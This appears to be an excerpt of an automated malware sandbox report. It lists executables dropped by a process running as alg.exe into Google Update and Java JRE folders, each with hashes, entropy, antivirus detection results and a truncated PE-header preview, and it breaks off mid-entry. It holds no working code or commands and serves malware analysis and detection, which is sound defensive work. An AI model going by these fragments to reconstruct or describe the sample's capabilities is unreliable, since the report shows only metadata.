Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p\|..p..q\|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@......@........................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Common Files\Oracle\Java\javapath_target_749031\javaws.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1513984
Entropy (8bit):	5.48373238632038
Encrypted:	false
SSDEEP:	24576:px71iBLZ05jNTmJWExvsqjnhMgeiCl7G0nehbGZpbD:pxhiHIjNgTDmg27RnWGj
MD5:	3EE3467481AE751437E50CED2615F2C6
SHA1:	3CCAA3C8847EE991E81AA842E1304F45205095B3
SHA-256:	CFC015E622850092AE434C1BAE2138A42955B3410CDDCF723869FD54FBA5B720
SHA-512:	8B781CD28DB6407C5209DD1673BF0673AB1281F2C483A748CCA3B758422E93B587585A1C44DF48E97215E9567005A201F73654FE82D123FE32F788AD777CC76F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@..................................R..........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1419264
Entropy (8bit):	5.466711831292199
Encrypted:	false
SSDEEP:	24576:mlnRklQ6fgJcEwixtsqjnhMgeiCl7G0nehbGZpbD:CoRfgJcEwCRDmg27RnWGj
MD5:	2EBE746A0986FFE7A173E916A2149AC5
SHA1:	412BBD276B69CB18FC73649AE839043935417E27
SHA-256:	3800226B135EA3EFE7FA828896E59221AA6B59025AC8129E82114C3CB0DEBA28
SHA-512:	568ED85321B0BCF35D1B3AF02A723ACA58D854B5F92536EBE6D4A47A815F0C27B625597BB1FEC04F873971BA6B8B96FFB4FBD465B882B139870F3F94A7DDAAA4
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........\|../../../L...../L...8./+...../+...../+...../L...../L...../../4./..../.s/../..../Rich../........................PE..L...A..d.............................s............@..................................)......................................<........P...2..............................T...........................8...@............................................text............................... ..`.rdata...%.......&..................@..@.data...d(... ......................@....rsrc....2...P...4..................@..@.reloc...p.......`...H..............@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1522176
Entropy (8bit):	5.496523784512784
Encrypted:	false
SSDEEP:	24576:LW25k8hb0Haw+xdsqjnhMgeiCl7G0nehbGZpbD:LWyk8SHawmBDmg27RnWGj
MD5:	924AFC498088ECCF5B43D2FED3256F84
SHA1:	7EF994C715EE6BB0151AC026E163428A62D11366
SHA-256:	6513E63CE4B29D576137329B2658113D6EB6563558DC6CB4F60088BBF4B64133
SHA-512:	02575A78BD2A3B40AC59F64050B442ADB194FB1A5AC7D454E5692906AEB0DB0E23C12AFC4AA75A014EFBCCF4B853ABB0522B866BD2C6EE185801F805CA17DA3E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........v.s.%.s.%.s.%...$ms.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%...$.s.%.s.%xr.%...$.s.%...%.s.%...$.s.%Rich.s.%................PE..d...X..d.........."..........R......L..........@....................................u..... ..................................................M....... ...2.......,................... ..T............................ ..................(............................text............................... ..`.rdata..............................@..@.data....6...p.......X..............@....pdata...,...........j..............@..@_RDATA..............................@..@.gxfg...0...........................@..@.gehcont............................@..@.rsrc....2... ...4..................@..@.reloc...`...`...P..................@...........................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdate.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1282048
Entropy (8bit):	5.163937816439657
Encrypted:	false
SSDEEP:	12288:VWP/aK2vB+iXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3b:VKCKABlsqjnhMgeiCl7G0nehbGZpbD
MD5:	097820BBE1E4BF8BEB658073840FC2F9
SHA1:	5CA97E9AEE5809A099A848DE205F2BCF98C431CB
SHA-256:	9E6A1FB172FBF39678D989A3E47EE607756E6D48E4FF494E95B52340292E4832
SHA-512:	AE64035C563FDF91732066B796D80580C55F60E54DE167CAA5B1265AE8828E103EC52C632BBDC5691FF7C92CEBFC9E58B146FF725459B4C4B93935FA86E00318
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........;...U..U..U.M.V..U.M.P...U.M.Q..U..Q..U..V..U.*.P..U.M.T..U..T...U..\..U....U.....U..W..U.Rich..U.........PE..L...9..d.................D..........Ru.......`....@.........................................................................P...x....... ...........................p[..T............................[..@...............L............................text....B.......D.................. ..`.data...x....`.......H..............@....idata...............R..............@..@.rsrc... ............\..............@..@.reloc...`.......P...@..............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateBroker.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1228288
Entropy (8bit):	5.162018988085435
Encrypted:	false
SSDEEP:	12288:CO7cCNWB+09sXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:fjNWBPysqjnhMgeiCl7G0nehbGZpbD
MD5:	5A3DFA6C71C6865BB5D5AFFE0927C336
SHA1:	7972EC3E1FFA8F329D53C135557997DB51CF1CF0
SHA-256:	BF91C97710CA578331B3C7F6765A42E092F669EB4116241B247215808792B1FD
SHA-512:	5E6B73A17C575112CB64B7E669407487CF4FE46C511210DDD337D934C2A3C10BB73C026640703010C7D7F581054DADFCA21CA2B224F27B84ECC48E0F12290BC9
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...:..d..........................................@.................................x{.......................................5..<....`..p2...........................+..T...........................X+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateComRegisterShell64.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	1302528
Entropy (8bit):	5.238914331318834
Encrypted:	false
SSDEEP:	24576:+ihRyhdsRrosqjnhMgeiCl7G0nehbGZpbD:+ihsoRUDmg27RnWGj
MD5:	B6D84F46DC8690F65A12DFBFAFDBA9C5
SHA1:	C3EC99CEEFC3D75777EC57FF9B6BF286276345E0
SHA-256:	E55990E972E0D017FCABB92BFE0E86C7C15F33BCF7D3DF377E8FA3C24453101C
SHA-512:	2C19E7CDFBE252005CABF39806E45EC3601DBA4031E18CEFC408271C24C7339BB782214538EEB1E2585AE3DBC104D15799F56D4FC050423CE8DD02D11274A30E
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9...X..X..X..~...X..~..X...2..X...2..X...2...X...3..X..~..X..~..X..X..?Y...3..X...3..X..Rich.X..........PE..d...A..d.........."......R...z.......R.........@.............................p............ ..................................................p..x....................................V..T...........................0W...............p...............................text....P.......R.................. ..`.rdata.......p.......V..............@..@.data...x3...........d..............@....pdata...............t..............@..@_RDATA..............................@..@.gxfg...............................@..@.gehcont............................@..@.reloc...P... ...@..................@...........................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateCore.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1342464
Entropy (8bit):	5.35100953867862
Encrypted:	false
SSDEEP:	24576:11FDmRF+wpx/QafDsqjnhMgeiCl7G0nehbGZpbD:lmRF+wn/JfHDmg27RnWGj
MD5:	62B0965ABCD6577BBF0E666E1E12EE20
SHA1:	9B131C627E0256AF717A99B6473F6655B5C6B75E
SHA-256:	EDCD1FEF776D4347853CD17795CF805234DC1D716CD07D8F349E9E5900A80321
SHA-512:	7F6203BC1C9748AC0CFC1D14B9C7D7AE118A65FC1635950EDAE701B577C06F2DC4BF12AE943AF4432820ABAA0E97E7361AF837F80A1C352EE815019C3F72A3FD
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......\|6..8W..8W..8W...%..6W...%...W...=...W...=...W...=..{W...%.. W...%..#W..8W...V..L<...W..L<s.9W..L<..9W..Rich8W..................PE..L...Y..d.....................r....................@.................................:................................................0...2..............................T...........................h...@............................................text...e........................... ..`.rdata..b...........................@..@.data....'..........................@....rsrc....2...0...4..................@..@.reloc...p...p...`..................@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleUpdateOnDemand.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1228288
Entropy (8bit):	5.161979023154444
Encrypted:	false
SSDEEP:	12288:e2Ae621B+0YmXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDtL:zE21BPxsqjnhMgeiCl7G0nehbGZpbD
MD5:	7099BF464FB5E2D5594CD9333F0E2207
SHA1:	9ACD724FF69BF276535155957E227A7D3D08B687
SHA-256:	7FA05CCAAF98D223A18DBC047699F83AF248342AD26CCE2174E1C28FD7E6000A
SHA-512:	FCB31F96B5155073BECB5F0ED908264293AD72F34B93A915116F9B8C05550670F5D10F654C19D73728467F06EE0FE0C325915E78DA0DA415CE4BCBA771A7AD75
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..............Z...Z...Z..[..Z..[L..Z..[..Zu.[.Zu.[..Zu.[..Z..[..Z...Z...Z..[...Z..]Z...Z..5Z...Z..[...ZRich...Z........................PE..L...;..d..........................................@.................................I{.......................................5..<....`..p2...........................+..T...........................h+..@............................................text...h........................... ..`.rdata...\.......^..................@..@.data........@.......0..............@....rsrc...p2...`...4...:..............@..@.reloc...`.......P...n..............@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Google\Update\Download\{8A69D345-D564-463C-AFF1-A69D9E530F96}\117.0.5938.132\117.0.5938.132_chrome_installer.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32+ executable (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	105669632
Entropy (8bit):	7.999989847599161
Encrypted:	true
SSDEEP:	3145728:eLAKHgDx/oat8qdTsdZDAE1mXXaYS79zDIICU:sBWx/pt8U7E6aZRfIICU
MD5:	25B7706A0145A248FA5C390549EC2DBB
SHA1:	89487A1195F2A66C41A9CE34EE034924BA789197
SHA-256:	3DD819E47584E9C8C7CDFA0C7DF529174A0A874AE3A517B219B6758613BB1708
SHA-512:	75315D4E6C6BC1C741B781FE7909226FE171F96D7D8158C98F8721306E30851D7C6CF86588FE385190A25C539185E5B445B34348DF90E2F6ADB69B160E72011F
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..d....\|.e.........."......4...LC................@..............................L.......L... ..................................................X..P........+C.....\|....................W..............................PP..@............Z...............................text...&2.......4.................. ..`.rdata.......P.......8..............@..@.data...p....p.......N..............@....pdata..\|............P..............@..@.00cfg..0............T..............@..@.retplne.............V...................rsrc....+C......,C..X..............@..@.reloc........C.......C.............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\jabswitch.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1158144
Entropy (8bit):	5.068073212795225
Encrypted:	false
SSDEEP:	12288:VlXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:VlsqjnhMgeiCl7G0nehbGZpbD
MD5:	4FE31FB578DA2E2FB9ED76E9E11F6A97
SHA1:	B3EA4563F75F6368225F86BEF77ADE0BDBAD35C4
SHA-256:	C3816A053B6B79D68B0F993063A6EF67ECEC8EB36C8DC52E16846EB2A817FF7B
SHA-512:	A63960B5DF9DE18332712E2069ADCAE7DEFEBCC0A444DAFA7CE38C676785AA4F24881C3114D4850445E1B84C2C6340D46312E9E3D53E6919F278D1B7E38C25E0
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........8.C.VWC.VWC.VWJ..WS.VW!.WVA.VW!.SV\.VW!.RVO.VW!.UVB.VWW.WVJ.VWC.WW!.VW.SVB.VW..WB.VW.TVB.VWRichC.VW........PE..L.....d.................8...6.......4.......P....@.................................. ......................................$i.......................................b..T............................a..@............P...............................text....7.......8.................. ..`.rdata...#...P...$...<..............@..@.data...L............`..............@....rsrc................b..............@..@.reloc...P.......@...l..............@...........................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\java-rmi.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032403233429513
Encrypted:	false
SSDEEP:	12288:fKCXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:CCsqjnhMgeiCl7G0nehbGZpbD
MD5:	A191708A8EE423FEEEA157938404B169
SHA1:	51CE92996591C751D505913BCE0796E510C3257F
SHA-256:	00E7F5781FA0C92113AC4B284BAB80DC1486F534ABEB9F8312E2A124AC25A8B2
SHA-512:	9F05FC866400C9E5E908A8618B342C3A6775891D6C8D0292E500640A1EF0A4287DB984C1A163F93E1DA730DAD370F86851AE9205EC440292FFF553C0A4065296
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................#........................................&.......@..d...........................h"..T............................!..@............ ...............................text............................... ..`.rdata....... ......................@..@.data........0....... ..............@....rsrc...d....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\java.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1375232
Entropy (8bit):	5.4460532520124705
Encrypted:	false
SSDEEP:	12288:jnEbH0j4x7R6SvyCMrXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/nT:jkwOtO7rsqjnhMgeiCl7G0nehbGZpbD
MD5:	52100B8F157CBDEBEFF94D41A6A12AB6
SHA1:	41C433FCDABEE69F6FABE4549319250C9061899C
SHA-256:	4793D4B2011B22622FC45C9FCE6F1A95544EBAB03B8B75B060BECEA0FAFF188F
SHA-512:	B2968BB0DC40621B9F1F23C09C952E098C0742B80F3E51A811A93E7790812E01541D10F8039FED58ED984FB860FA01BC6C22A95395B138900FA79FF6809430B4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......x..F<...<...<...(..3...(......(......^.F.;...^......^......^..)...(..5...<...N......3.....D.=......=...Rich<...........................PE..L.....d.................N...t....../........`....@..........................@...............................................!..d....P..............................P...T...............................@............`...............................text...\M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc........P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\javacpl.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1212416
Entropy (8bit):	5.119730129333301
Encrypted:	false
SSDEEP:	12288:Pv1vveXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:H1+sqjnhMgeiCl7G0nehbGZpbD
MD5:	E1C4D439BAFA341AAA60CB6F6FD38488
SHA1:	7ED3A6BCE34DF8635B2053EBAA0CA10DBCACF405
SHA-256:	9734E887572BC0C20FEBE656569E0E1D7D1E3FDDD42400F0A9DB9B6C19650984
SHA-512:	D779E2E5D8E307CCBFC767C7415366F179B85EAF9DAABA9864291BFE2D6EBABDA0CA986FD67ECEC6EB53C902262A453EED52653F5F9D403554FFBFA55BAD5F69
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......VT.f.5.5.5.5.5.5.M\5.5.5pM.4.5.5pM.4.5.5pM.4.5.5.^.4.5.5.5.5.5.5pM.455.5.L.4.5.5.L05.5.5.L.4.5.5Rich.5.5........................PE..L.....d.................P...........K.......`....@.........................................................................8...@......................................T...............................@............`...............................text....O.......P.................. ..`.rdata...g...`...h...T..............@..@.data...@...........................@....rsrc...............................@..@.reloc...P...p...@...@..............@...........................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\javaw.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1375232
Entropy (8bit):	5.446812886068743
Encrypted:	false
SSDEEP:	24576:7nU/h/4KcsqjnhMgeiCl7G0nehbGZpbD:7U/VIDmg27RnWGj
MD5:	05EFBBD4EF7FEAA8291F5F9DE4470525
SHA1:	2B8689154AF42C939AC140DC91B3645BB307FF2E
SHA-256:	8E0DFDC8C3D4504967D1F48A653C0A7815C00221C490DDEAAD3FB3DCB92A54E3
SHA-512:	14A796D29FAAC543D896D23357A13F2A456060BFA6D8FFBEC21852F354D1114B1EAEA33E03EC76722D8E74B2E24A3391BE53DCC6BFB72C53E50BA59D5BC0437A
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......9..#}..p}..p}..pi.qr..pi.q..pi.qo..p..}pz..p..qX..p..qo..p..qh..pi.qt..p}..p...p..qr..p...p\|..p..q\|..pRich}..p........................PE..L.....d.................N...t......7........`....@..........................@...............................................!..d....P.............................P...T...............................@............`...............................text....M.......N.................. ..`.rdata..@....`.......R..............@..@.data........0......................@....rsrc.......P.......*..............@..@.reloc...`.......P..................@...........................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\javaws.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1513984
Entropy (8bit):	5.483736500892319
Encrypted:	false
SSDEEP:	24576:wx71iBLZ05jNTmJWExvsqjnhMgeiCl7G0nehbGZpbD:wxhiHIjNgTDmg27RnWGj
MD5:	CFAAD4CB02866305EB51C9C6445F8CB8
SHA1:	ECAD778D6D1ED4EA8DFD8E3D732AD4F2BEDCD4D9
SHA-256:	5D021A1981EF586DBC9C6D47065736E49FA00DD21ED5256919477B8F5BAA9D10
SHA-512:	18AE465A0BED40CB43A873319EAA489F299024BA549DDC3D7CD1FDA6463C57A8B0568FE24A8414314365DF4033C0E42E6019F0A83697BD24BD5F4A7837817729
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......p...4rv.4rv.4rv. .u.>rv. .s..rv. .r.&rv.V.r.!rv.V.u.,rv.V.s..rv. .w.?rv.4rw..rv..r.&rv..s.0rv....5rv..t.5rv.Rich4rv.................PE..L.....d............................^.............@..................................P..........................................x...................................L...T............................4..@...................,........................text...,........................... ..`.rdata..:(.......*..................@..@.data............t..................@....rsrc................:..............@..@.reloc...p...0...`..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\jjs.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.0328895845278785
Encrypted:	false
SSDEEP:	12288:J3rSXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:t+sqjnhMgeiCl7G0nehbGZpbD
MD5:	95C044F7DB676E235DE57209B3E81944
SHA1:	FB50B710C885F87C4C234CDED10B744F74965EFB
SHA-256:	5CAD62F154120D88A89DA457431F1E1D6738F0FC5B472AF2DE991E7562245F29
SHA-512:	4361C9A50E9DC41BEC743F9C39584135AC7B5474F5510B4A98099C36D2D9966F7BE177CCB0C7118CF32F30693007E28D78C37BC3D9CF54CD6F89F52A9E82E0D7
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100%
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..........................................................................&.......@..H............................"..T............................!..@............ ...............................text............................... ..`.rdata..6.... ......................@..@.data........0....... ..............@....rsrc...H....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\jp2launcher.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1242112
Entropy (8bit):	5.172674703455928
Encrypted:	false
SSDEEP:	12288:AYdP/5Xc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:FdP/5sqjnhMgeiCl7G0nehbGZpbD
MD5:	0C535E9F6158B6ED91644BE24CD129E2
SHA1:	7342B8A02829D6629BE0C38FB3FE41F2DD965940
SHA-256:	094245CEF2F4107CB067928BCA7A77018553CD176FA71B0BE828F8B1FBE2704E
SHA-512:	72671909F6690E12DDA8E0DC86CDA9C265D3C26EE3F11CEED6167E99D354B6E79D100DAF0B151E3383F92631BBD5494129FE7E8F77B66115971E8A3195CC347B
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......<.$x..wx..wx..wq.uwn..wl..vp..w...v}..w...vu..w...v{..wx..w...w...v_..w...vy..w...vs..w...wy..w...vy..wRichx..w........PE..L...}.d..........................................@..........................P......;W..........................................h...................................`v..T............................u..@............................................text............................... ..`.rdata..R...........................@..@.data...P2..........................@....rsrc...............................@..@.reloc...`.......P..................@...................................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\keytool.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032914662449468
Encrypted:	false
SSDEEP:	12288:oy5qXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:V8sqjnhMgeiCl7G0nehbGZpbD
MD5:	8EA37942AA63DE24BC7F81CB99E3F57F
SHA1:	E9B59A774AF69B778CFE659C18FD96F013046F19
SHA-256:	64C26A7B946E6E379ACD2DDB9768DFB5FBA6CADC88B9D6D7AB73A9A147FAA0A9
SHA-512:	46BB5F86A01E16FEBA2EB833E2052C9883A51D90A7641B4B85B8359AB17FDFA943694A2748BA0EA610506D242E3011519A44D9E5579A45F3D4DA00742D67CAE4
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@..................................W.......................................&.......@..\............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...\....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\kinit.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032981483190116
Encrypted:	false
SSDEEP:	12288:OKlCXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:vYsqjnhMgeiCl7G0nehbGZpbD
MD5:	557BF22035F49C0CBDA8A06E102ED283
SHA1:	DD520B7A6809B505EDECCDDE1F45F0269BA21CD0
SHA-256:	508AA1EC0111F88A3C166AEAD806FACDD2714EFA266C08EADBF9CB3FDECC52F6
SHA-512:	803C06100022E897E5283F66C650F269DDF5F9304A8B854916EA2B4391C27EA32FBE7C38E3412D9AE31C1F1F70B8B0B2653F647803DFBAB91926C2C5848728C0
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................t........................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\klist.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032981248138757
Encrypted:	false
SSDEEP:	12288:YilCXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:ZYsqjnhMgeiCl7G0nehbGZpbD
MD5:	4F09B28D2632A5A8020594785BFFB40A
SHA1:	8B4080F9D5C3612678B2E2A89D9F1A976A235CE0
SHA-256:	7E996A49B9D7144A8A567531D167C225F7F8727800D840BCA43280EB6812460B
SHA-512:	ECD4FF3E5EC125CEE006F6FA003A0D73684AF38F79F7D211815036062160DEDBFE0D9832160F0E8F42EB380218D8D7F4914EFE0D05DA14AEB0405FDF4ADFCFB6
Malicious:	true
Reputation:	unknown
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........q..A...A...A...Hh..M...#h..C...U{..C...#h..R...#h..M...#h..@....i..B...A...w....i..@....in.@....i..@...RichA...........................PE..L.....d..................................... ....@.................................*........................................&.......@..T............................"..T............................!..@............ ...............................text............................... ..`.rdata..>.... ......................@..@.data........0....... ..............@....rsrc...T....@......."..............@..@.reloc...P...P...@..................@...................................................................................................................................................................................................................................................................................................

C:\Program Files (x86)\Java\jre-1.8\bin\ktab.exe

Download File

Process:	C:\Windows\System32\alg.exe
File Type:	PE32 executable (console) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	1142272
Entropy (8bit):	5.032947516110992
Encrypted:	false
SSDEEP:	12288:HTmiXc3ajG+hjQKymY8efKCpD7Gj9G6G1qT8nQkCu83L3Wl/np9DBDt3kbE:znsqjnhMgeiCl7G0nehbGZpbD
MD5:	FA3CCE747C8D839953CF69FE05F4B005
SHA1:	80E460EE70AA58375751A4496920CFDBCE5A5FA5
